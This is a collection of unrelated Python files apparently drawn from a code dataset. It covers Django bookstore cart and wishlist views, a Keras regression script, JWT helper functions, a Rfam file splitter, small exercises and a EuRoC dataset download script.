        # Keep the session in sync with the edited profile.
        request.session['fname']=user.first_name
        request.session['email']=user.email
        request.session['user_image']=user.user_image.url
        msg="Profile Updated successfully"
        return render(request,'myapp/profile.html',{'msg':msg,'user':user})
    else:
        user=User.objects.get(email=request.session['email'])
        try:
            # 'data' flags the buyer variant of the template.
            if user.usertype=='user':
                data="user"
                return render(request,'myapp/profile.html',{'user':user,'data':data})
            else:
                return render(request,'myapp/profile.html',{'user':user})
        except:
            return render(request,'myapp/profile.html')
def user_book_details(request, pk):
    """Buyer-side detail page for the book with primary key `pk`."""
    selected = Book.objects.get(pk=pk)
    return render(request, 'myapp/user_book_details.html', {'books': selected})
def add_to_cart(request, pk):
    """Add book `pk` to the session user's cart, removing it from the
    user's wishlist if present, then show the cart."""
    book = Book.objects.get(pk=pk)
    user = User.objects.get(email=request.session['email'])
    Cart.objects.create(book=book, user=user)
    mycart = Cart.objects.filter(user=user)
    request.session['cartcount'] = len(mycart)
    # BUG FIX: the original filtered Wishlist by its *own* pk using the
    # Book's pk (Wishlist.objects.filter(pk=pk)), which deletes an
    # unrelated wishlist row — or none.  Delete this user's entry for
    # this book instead.
    Wishlist.objects.filter(book=book, user=user).delete()
    return render(request, 'myapp/my_cart.html', {'mycart': mycart})
def my_cart(request):
    """Show the session user's cart together with the summed price."""
    user = User.objects.get(email=request.session['email'])
    mycart = Cart.objects.filter(user=user)
    request.session['cartcount'] = len(mycart)
    # book_price is stored as text, hence the int() per item.
    total_price = sum(int(item.book.book_price) for item in mycart)
    return render(request, 'myapp/my_cart.html',
                  {'mycart': mycart, 'total_price': total_price})
def remove_cart(request, pk):
    """Delete one cart row, refresh the cart count, and re-render the cart."""
    Cart.objects.filter(pk=pk).delete()
    user = User.objects.get(email=request.session['email'])
    mycart = Cart.objects.filter(user=user)
    request.session['cartcount'] = len(mycart)
    msg = "Book's Removed from Cart successfully"
    return render(request, 'myapp/my_cart.html', {'mycart': mycart, 'msg': msg})
def move_to_wishlist(request,pk):
    """Move a cart row (`pk` is the Cart pk) into the wishlist.

    If the same book is already wishlisted the cart row is kept and a
    message is shown; otherwise the wishlist entry is created and the
    cart row deleted.
    """
    cart=Cart.objects.get(pk=pk)
    book=Wishlist.objects.filter(book=cart.book,user=cart.user)
    if book:
        user=User.objects.get(email=request.session['email'])
        wish_list=Wishlist.objects.filter(user=user)
        msg="book is alrady available in wishlist"
        return render(request,'myapp/wish_list.html',{'wish_list':wish_list,'msg':msg})
    else:
        Wishlist.objects.create(book=cart.book,user=cart.user)
        cart.delete()
        user=User.objects.get(email=request.session['email'])
        wish_list=Wishlist.objects.filter(user=user)
        return render(request,'myapp/wish_list.html',{'wish_list':wish_list})
def wishlist(request):
    """Show the session user's wish list."""
    owner = User.objects.get(email=request.session['email'])
    items = Wishlist.objects.filter(user=owner)
    return render(request, 'myapp/wish_list.html', {'wish_list': items})
def remove_wishlist(request, pk):
    """Delete one wishlist row, then show the user's wish list.

    The original re-rendered the just-deleted queryset under the key
    'wishlist', while wish_list.html is fed 'wish_list' by every other
    view here (wishlist, move_to_wishlist, add_to_wishlist), so the
    page came up empty.  Fetch and pass the user's list consistently.
    """
    Wishlist.objects.filter(pk=pk).delete()
    user = User.objects.get(email=request.session['email'])
    wish_list = Wishlist.objects.filter(user=user)
    msg = "Wised Book Deleted"
    return render(request, 'myapp/wish_list.html',
                  {'msg': msg, 'wish_list': wish_list})
def move_to_cart(request,pk):
    """Move a wishlist row (`pk` is the Wishlist pk) into the cart.

    If the same book is already in the cart the wishlist row is kept
    and a message shown; otherwise the cart entry is created and the
    wishlist row deleted.
    NOTE(review): the already-in-cart branch passes the queryset under
    'cart' while every other cart view uses 'mycart' — confirm against
    my_cart.html.
    """
    wishlist=Wishlist.objects.get(pk=pk)
    cart=Cart.objects.filter(book=wishlist.book,user=wishlist.user)
    if cart:
        user=User.objects.get(email=request.session['email'])
        cart=Cart.objects.filter(user=user)
        msg="book is alrady available in Cart"
        return render(request,'myapp/my_cart.html',{'cart':cart,'msg':msg})
    else:
        Cart.objects.create(book=wishlist.book,user=wishlist.user)
        wishlist.delete()
        user=User.objects.get(email=request.session['email'])
        mycart=Cart.objects.filter(user=user)
        return render(request,'myapp/my_cart.html',{'mycart':mycart,'user':user})
def add_to_wishlist(request, pk):
    """Put book `pk` on the session user's wish list and show the list."""
    owner = User.objects.get(email=request.session['email'])
    chosen_book = Book.objects.get(pk=pk)
    Wishlist.objects.create(book=chosen_book, user=owner)
    items = Wishlist.objects.filter(user=owner)
    return render(request, 'myapp/wish_list.html', {'wish_list': items})
|
import numpy as np
# Boston-housing regression with a Keras functional-API MLP.
x_data = np.load('../data/npy/boston_x.npy')
y_data = np.load('../data/npy/boston_y.npy')
print(x_data.shape, y_data.shape)
from sklearn.model_selection import train_test_split
# 64/16/20 train/val/test split (val is 20% of the training portion).
x_train, x_test, y_train, y_test = train_test_split(x_data, y_data, test_size=0.2, random_state=45)
x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, test_size=0.2, random_state=45)
from sklearn.preprocessing import MinMaxScaler
# Fit the scaler on the training set only, then apply it to every
# split — avoids leaking test statistics into preprocessing.
scaler = MinMaxScaler()
scaler.fit(x_train)
x_train = scaler.transform(x_train)
x_test = scaler.transform(x_test)
x_val = scaler.transform(x_val)
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dense, Input
# 13 input features -> five ReLU hidden layers -> single linear output.
input1 = Input(shape=(13,))
dense1 = Dense(128, activation='relu')(input1)
dense2 = Dense(64, activation='relu')(dense1)
dense3 = Dense(64, activation='relu')(dense2)
dense4 = Dense(64, activation='relu')(dense3)
dense5 = Dense(64, activation='relu')(dense4)
output1 = Dense(1)(dense5)
model = Model(inputs=input1, outputs=output1)
model.compile(loss='mse', optimizer='adam', metrics=['mae'])
from tensorflow.keras.callbacks import EarlyStopping
# Large epoch budget; early stopping on validation loss ends training.
es = EarlyStopping(monitor='val_loss', patience=20, mode='auto')
model.fit(x_train, y_train, epochs=4000, batch_size=8, validation_data=(x_val, y_val), verbose=2, callbacks=[es])
loss, mae = model.evaluate(x_test, y_test)
print('loss :', loss)
print('MAE :', mae)
y_predict = model.predict(x_test)
from sklearn.metrics import mean_squared_error, r2_score
def rmse(y_test, y_predict):
    """Root-mean-squared error between targets and predictions."""
    return np.sqrt(mean_squared_error(y_test, y_predict))
print('RMSE :', rmse(y_test, y_predict))
r2 = r2_score(y_test, y_predict)
print('R2 :', r2)
# Result
# loss : 12.888792991638184
# MAE : 2.693161725997925
# RMSE : 3.5900966129801355
# R2 : 0.8807454181824746
from setuptools import setup, find_packages
# Minimal packaging script for the `tutils` helper library; picks up
# every package under the project root via find_packages().
setup(
    name="tutils",
    version="1.0",
    author="trans",
    author_email="transcendentsiki@gmail.com",
    packages=find_packages()
)
# py_modules=['tutils'],
#import sys
#input = sys.stdin.readline
def main():
    """Competitive-programming solution read from stdin.

    Reads N and a list A of N+1 integers (A[d] = required number of
    leaves at depth d) and prints the maximum possible total vertex
    count of a tree satisfying those leaf counts, or -1 if impossible.
    The `*2` / `(low+1)//2` arithmetic indicates each node may have at
    most two children (binary tree) — presumably an AtCoder problem;
    verify against the original statement before modifying.
    """
    N = int( input())
    A = list( map( int, input().split()))
    root = 1  # NOTE(review): unused
    # A leaf at depth 0 means the root itself is a leaf, which is only
    # consistent with a depth-0 tree.
    if A[0] == 1:
        if N == 0:
            print(1)
        else:
            print(-1)
        return
    B = A[::-1]
    # Bottom-up pass over reversed depths: track the feasible range
    # [low, high] of vertex counts at each level.
    low = high = B[0]
    # Low = []
    Hight = [high]
    Low = [low]
    for b in B[1:]:
        # At least ceil(children/2) internal parents are needed, plus
        # the b leaves demanded at this level.
        low = max(1, (low+1)//2) + b
        high = high + b
        Hight.append(high)
        Low.append(low)
    # The top level (root) must be feasible with exactly one vertex.
    if low > 1:
        print(-1)
        return
    ans = 1
    now = 1
    BHight = Hight[::-1]
    BLow = Low[::-1]
    # Greedy top-down pass: place as many vertices per level as the
    # bounds permit; `now` carries the internal (non-leaf) count down.
    for i in range(1,N+1):
        high = BHight[i]
        low = BLow[i]
        if high < now or now*2 < low:
            print(-1)
            return
        leaf = A[i]
        now = min(high, now*2)
        ans += now
        now -= leaf
    print(ans)

if __name__ == '__main__':
    main()
|
# Split a Stockholm-format Rfam.seed dump into one .msa file per
# family: every '# STOCKHOLM 1.0' header starts a new output file.
file_name = '/home/kenny/data/Rfam.seed'
counter = 0
tempFile = None
with open(file_name, 'rb') as f:
    for line in f:
        if line == b'# STOCKHOLM 1.0\n':
            if tempFile is not None:
                tempFile.close()
            counter += 1
            # "xb": fail loudly instead of clobbering an existing file.
            tempFile = open('/home/kenny/data/msa/RF000{}.msa'.format(counter), "xb")
        # Assumes the dump starts with a header line (as the original
        # did); otherwise this raises before any file is opened.
        tempFile.write(line)
if tempFile is not None:
    tempFile.close()  # the original leaked the last output file
|
import json
import jwt
import time
from datetime import datetime, timedelta
from django.conf import settings as st
from logging import getLogger
# Module-level logger shared by everything importing this helper module.
logger = getLogger('command')
# Star-imports from this module expose only the logger.
__all__ = ('logger',)
def json_loads(data):
    """Parse *data* as JSON, returning it unchanged if it cannot be parsed.

    Narrowed from a bare except: only decode failures (invalid JSON
    text → ValueError/JSONDecodeError) and type failures (non-string
    input → TypeError) fall back to returning the raw value; anything
    else (e.g. KeyboardInterrupt) propagates.
    """
    try:
        return json.loads(data)
    except (ValueError, TypeError):
        return data
def json_dumps(data, indent=4):
    """Serialize *data* to indented JSON, returning it unchanged on failure.

    Narrowed from a bare except: only serialization failures
    (unserializable type → TypeError, circular reference → ValueError)
    fall back to returning the raw value.
    """
    try:
        return json.dumps(data, indent=indent)
    except (TypeError, ValueError):
        return data
def jwt_encode(data):
    """Sign *data* as a JWT that expires in one day.

    Mutates the passed-in dict by adding the 'exp' claim.
    NOTE(review): written against PyJWT 1.x, where encode() returns
    bytes; under PyJWT >= 2.0 it returns str and .decode("utf-8")
    below would raise AttributeError — confirm the pinned version.
    """
    # Local time, not UTC — presumably acceptable here; verify.
    exp_time = datetime.now() + timedelta(days=1)
    exp_time = int(time.mktime(exp_time.timetuple()))
    data.update({
        'exp': exp_time,
    })
    encode = jwt.encode(data, st.SECRET_KEY)
    return encode.decode("utf-8")
def jwt_decode(data):
    """Decode/verify a JWT, returning its payload or None on any failure.

    NOTE(review): PyJWT >= 2.0 requires an explicit algorithms=[...]
    argument and would raise here; with PyJWT 1.x this call works as
    written — confirm the pinned version.
    """
    try:
        return jwt.decode(data, st.SECRET_KEY)
    except Exception as ex:
        print(ex)
        return None
|
# Python 2 script: urllib2 was removed in Python 3 (urllib.request
# replaces it there).
import urllib2
# Fetch the response headers of three sites as (name, value) pairs.
example = urllib2.urlopen("http://example.com").headers.items()
wikipedia = urllib2.urlopen("http://en.wikipedia.org/wiki/Python_(programming_language)").headers.items()
statesman = urllib2.urlopen("http://statesman.com").headers.items()
# NOTE(review): the matches below are case-sensitive against lowercase
# names — relies on Python 2's header dict lowercasing keys; verify.
print([x[1] for x in example if x[0] == 'last-modified'])
print([x[1] for x in statesman if x[0] == 'server'])
print([x[1] for x in wikipedia if x[0] == 'age'])
|
# Generated by Django 2.0 on 2017-12-15 20:48
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: make UserProfile.dob default to today's date.

    Note the default is the callable datetime.date.today (evaluated at
    row-creation time), not a fixed date.
    """

    dependencies = [
        ('main', '0011_userprofile_dob'),
    ]
    operations = [
        migrations.AlterField(
            model_name='userprofile',
            name='dob',
            field=models.DateField(default=datetime.date.today),
        ),
    ]
|
def recursion(number):
    """Print the numbers 1..10 ascending then 10..1 descending.

    Each call prints its number on the way down the recursion and
    again on the way back up.
    """
    if number > 10:
        return  # guard clause replaces the original's enclosing if
    print(f'{number}', end=' ')
    recursion(number + 1)
    print(f'{number}', end=' ')
recursion(1)
|
# Download and unzip the EuRoC MAV dataset sequences.
import subprocess
import glob
import argparse

if __name__ == "__main__":
    # Zip paths relative to base_path.
    # BUG FIX: the original listed V1_01_easy twice, so it was
    # downloaded (and wget-suffixed) twice; deduplicated here.
    sequences = [
        "machine_hall/MH_01_easy/MH_01_easy.zip",
        "machine_hall/MH_02_easy/MH_02_easy.zip",
        "machine_hall/MH_03_medium/MH_03_medium.zip",
        "machine_hall/MH_04_difficult/MH_04_difficult.zip",
        "machine_hall/MH_05_difficult/MH_05_difficult.zip",
        "vicon_room1/V1_01_easy/V1_01_easy.zip",
        "vicon_room1/V1_02_medium/V1_02_medium.zip",
        "vicon_room1/V1_03_difficult/V1_03_difficult.zip",
        "vicon_room2/V2_01_easy/V2_01_easy.zip",
        "vicon_room2/V2_02_medium/V2_02_medium.zip",
        "vicon_room2/V2_03_difficult/V2_03_difficult.zip",
    ]
    base_path = "http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/"

    parser = argparse.ArgumentParser(description="Foo")
    parser.add_argument(
        "--dataset_dir", type=str, default="./", help="path to download dataset, need large storage"
    )
    parser.add_argument(
        "--if_download", action="store_true", default=False, help="download the dataset"
    )
    parser.add_argument(
        "--if_untar", action="store_true", default=False, help="untar the downloaded file"
    )
    args = parser.parse_args()
    print(args)

    if args.if_download:
        for seq in sequences:
            # shell=True is retained; the URL and directory come from
            # the hard-coded list / CLI flag, not untrusted input.
            subprocess.run(f"wget {base_path + seq} -P {args.dataset_dir}", shell=True, check=True)

    if args.if_untar:
        # Extract each zip next to itself, into a directory named
        # after the archive (sans ".zip").
        for zip_path in glob.glob(f"{args.dataset_dir}/*.zip"):
            command = f"unzip {zip_path} -d {str(zip_path)[:-4]}"
            print(f"run: {command}")
            subprocess.run(command, shell=True, check=True)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.